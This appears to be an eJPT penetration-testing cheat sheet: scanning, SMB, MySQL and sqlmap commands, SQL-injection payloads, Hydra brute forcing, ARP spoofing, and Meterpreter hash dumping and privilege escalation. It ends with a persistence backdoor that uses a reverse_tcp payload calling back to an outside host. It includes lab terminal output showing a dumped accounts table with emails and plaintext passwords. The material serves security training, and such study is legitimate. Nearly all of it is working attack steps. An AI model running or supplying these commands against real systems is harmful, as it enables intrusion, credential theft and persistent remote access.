EJPT Cheat Sheet
All the commands you need to pass the Elearnsecurity Junior Penetration Tester (EJPT)
Routing
View the existing routes
route
ip routeAdd new routes manually
ip route add ROUTETO via ROUTEFROM
example:
sudo ip route add 192.168.222.0/24 via 10.175.34.1Enumeration and Scanning
Whois
Ping Sweep
fping -a -g <ip-subnet/subnet mask> 2>/dev/nullexample:
fping -a -g 192.168.222.0/24 2>/dev/nullNmap
# OS Detection, no ping
nmap -Pn -O 10.10.10.10
# def scripts, version check
nmap -sC -sV 10.10.10.10
# above + All ports
nmap -sC -sV -p- 10.10.10.10
# UDP version check
nmap -sU -sV 10.10.10.10
#Syn scan, Version Scan, Os Detection, Aggressive,Port scan only.
sudo nmap -sS -sV -O -A -Pn 172.16.64.182,199 > nmap.txt
#checke for vulnerability using scripts
nmap --script=vuln -A 172.16.64.182,199 > nmap.txtSMB/SAMBA
nbtscan
nbtscan -A 10.10.10.10net view
net view 10.10.10.10net use
# c$ - shares in c drive
# admin$ - windows install directory
# ipc$ - inter process use (not viewable on browser)
# using no user/pass login
net use \\10.10.10.10\IPC$ '' /u:''
# The command completed successfully.
net use \\10.10.10.10\ADMIN$ '' /u:
# System error 5 has occurred.
# Access is denied.enum
# enumerate users
enum -U 10.10.10.10
# enumerate password policy
enum -P 10.10.10.10nmblookup
nmblookup -A 10.10.10.10smbclient
# no password mode -N
smbclient -L //10.10.10.10 -Nmysql
#Connecting database to site
mysql -u USERNAME -p PASSWORD -h HOST DB
#Selecting Database
use <db_name>
#viewing tables
show tables;
#select the tables
select * from <table_name>
┌──(kali㉿kali)-[~/Downloads]
└─$ mysql -h 10.104.11.198 -u awdmgmt -p 1 ⨯
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 465
Server version: 5.5.38-0+wheezy1 (Debian)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]> use awdmgmt_accounts
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [awdmgmt_accounts]> show tables;
+----------------------------+
| Tables_in_awdmgmt_accounts |
+----------------------------+
| accounts |
+----------------------------+
1 row in set (0.340 sec)
MySQL [awdmgmt_accounts]> select * from accounts;
+----+--------------------+----------+-------------+
| id | email | password | displayname |
+----+--------------------+----------+-------------+
| 1 | admin@awdmgmt.labs | ENS7VvW8 | Admin |
+----+--------------------+----------+-------------+SQLi and Sqlmap
sqlmap -u http://10.10.10.10 -p parameter
sqlmap -u http://10.10.10.10 --data POSTstring -p parameter
sqlmap -u http://10.10.10.10 --os-shell
sqlmap -u http://10.10.10.10 --dump
#list databases
sqlmap -u http://10.124.211.96/newsdetails.php?id=33 --dbs
#select database and list tables
sqlmap -u http://10.124.211.96/newsdetails.php?id=33 --dbs 'database_name' --tables
#Dump specific database
sqlmap -u http://10.124.211.96/newsdetails.php?id=33 -D awd -T accounts --dump
# banner grabbing
sqlmap -u http://10.10.10.10/view.php?id=1 -b
# dump specified database
sqlmap -u http://10.10.10.10/view.php?id=1 --current-db selfie4you --dump
#sql login pages bypass
' or 1=1; -- -
kali㉿kali)-[~/Desktop]
└─$ sqlmap -u http://10.124.211.96/newsdetails.php?id=33 --dbs awd --tables
___
__H__
___ ___[(]_____ ___ ___ {1.5.7#stable}
|_ -| . ['] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 02:54:56 /2021-09-12/
[02:54:57] [INFO] resuming back-end DBMS 'mysql'
[02:54:57] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=26 AND 8959=8959
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=26 AND (SELECT 5543 FROM (SELECT(SLEEP(5)))qhai)
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: id=26 UNION ALL SELECT CONCAT(0x71707a6271,0x794b62464a6e6f55584b525a78674e7a55684351744f5167664251617256566f54694f70614b5567,0x71786b6a71)-- -
---
[02:54:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7 (wheezy)
web application technology: PHP 5.4.4, Apache 2.2.22
back-end DBMS: MySQL >= 5.0.12
[02:54:58] [INFO] fetching database names
available databases [2]:
[*] awd
[*] information_schema
[02:54:59] [INFO] fetching tables for databases: 'awd, information_schema'
Database: information_schema
[40 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INNODB_BUFFER_PAGE |
| INNODB_BUFFER_PAGE_LRU |
| INNODB_BUFFER_POOL_STATS |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_TRX |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
Database: awd
[3 tables]
+---------------------------------------+
| accounts |
| awards |
| news |
+---------------------------------------+
[02:55:00] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.124.211.96'
[*] ending @ 02:55:00 /2021-09-12/
┌──(kali㉿kali)-[~/Desktop]
└─$ sqlmap -u http://10.124.211.96/newsdetails.php?id=33 -D awd -T accounts --dump
___
__H__
___ ___[(]_____ ___ ___ {1.5.7#stable}
|_ -| . [,] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 02:56:48 /2021-09-12/
[02:56:48] [INFO] resuming back-end DBMS 'mysql'
[02:56:48] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=26 AND 8959=8959
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=26 AND (SELECT 5543 FROM (SELECT(SLEEP(5)))qhai)
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: id=26 UNION ALL SELECT CONCAT(0x71707a6271,0x794b62464a6e6f55584b525a78674e7a55684351744f5167664251617256566f54694f70614b5567,0x71786b6a71)-- -
---
[02:56:49] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7 (wheezy)
web application technology: Apache 2.2.22, PHP 5.4.4
back-end DBMS: MySQL >= 5.0.12
[02:56:49] [INFO] fetching columns for table 'accounts' in database 'awd'
[02:56:51] [INFO] fetching entries for table 'accounts' in database 'awd'
Database: awd
Table: accounts
[11 entries]
+----+-----------------------------------------------------+-------------+-------------------+
| id | email | password | displayname |
+----+-----------------------------------------------------+-------------+-------------------+
| 1 | admin@awdmgmt.labs | S3cr3tBOFH | Admin |
| 2 | porta.elit.a@adipiscingMaurismolestie.net | VUH74DYX6DO | Mallory Reed |
| 3 | ipsum.leo.elementum@Phasellusfermentumconvallis.org | GUC97VHY8HK | Katell Stewart |
| 4 | mauris.sit@torquent.edu | LPW27DSG6QE | Gemma Beck |
| 5 | Praesent.interdum@ametrisus.org | TWS34ORL6GX | Fuller Casey |
| 6 | Quisque.libero@Cum.ca | OSQ80TYZ6YW | Hu Miles |
| 7 | tincidunt.Donec.vitae@tempuseuligula.com | HOV82DUI9TF | Lacey Hawkins |
| 8 | dignissim.Maecenas@estcongue.org | TEO38KNA2UZ | Kaden Singleton |
| 9 | dictum@tempusrisusDonec.ca | LKK51JAO3PJ | Britanney Guzman |
| 10 | blandit.viverra.Donec@Suspendisse.net | PTS90MHF9XA | Aspen Byers |
| 11 | ligula@mollisDuis.ca | PLN49WZU6IB | Alexandra Cabrera |
+----+-----------------------------------------------------+-------------+-------------------+
[02:56:52] [INFO] table 'awd.accounts' dumped to CSV file '/home/kali/.local/share/sqlmap/output/10.124.211.96/dump/awd/accounts.csv'
[02:56:52] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.124.211.96'
[*] ending @ 02:56:52 /2021-09-12/
┌──(kali㉿kali)-[~/Desktop]
└─$
John for cracking
john -wordlist /path/to/wordlist -users=users.txt hashfileHydra
hydra -L users.txt -P pass.txt -t 10 10.10.10.10 ssh -s 22
hydra -L users.txt -P pass.txt telnet://10.10.10.10SMB / SAMBA
nmblookup -A 10.10.10.10
smbclient -L //10.10.10.10 -N (list shares)
smbclient //10.10.10.10/share -N (mount share)
enum4linux -a 10.10.10.10ARP spoofing (Dsniff)
# tells my machine to forward packets incepted to the real desination hosts
echo 1 > /proc/sys/net/ipv4/ip_forward
# arpspoof -i <interface> -t <target> -r <host>
arpspoof -i tap0 -t 10.10.10.10 -r 10.10.10.11Metasploit
search x
use x
info
show options
show advancedMeterpreter
background
sessions -l
sessions -i 1
sysinfo
ifconfig
route
# get which user is running process
getuid
# privilege escalation ('User Account Control' GPO policy may prevent this)
getsystem
# bypass the restriction of 'User Account Control' GPO policy to privesc
bypassuac
# transfering files
download x /root/
upload x C:\\Windows
# run standard operating system shell
shell
use post/windows/gather/hashdumpMeterpreter - persistence backdoor
# persistent backdoor - need meterpreter session
msf > use exploit/windows/local/s4u_persistence
msf (s4u_persistence) > set session 2
#session => 2
msf (s4u_persistence) > set trigger logon
#trigger => logon
msf (s4u_persistence) > set payload windows/meterpreter/reverse_tcp
msf (s4u_persistence) > set lhost 1.2.3.4
msf (s4u_persistence) > set lport 1234
msf (s4u_persistence) > exploit
msf (s4u_persistence) > use exploit/multi/handler
msf (handler) > set payload windows/meterpreter/reverse_tcp
msf (handler) > exploit
# once victim restarts and logons, we will get a meterpreter shellLast updated
Was this helpful?
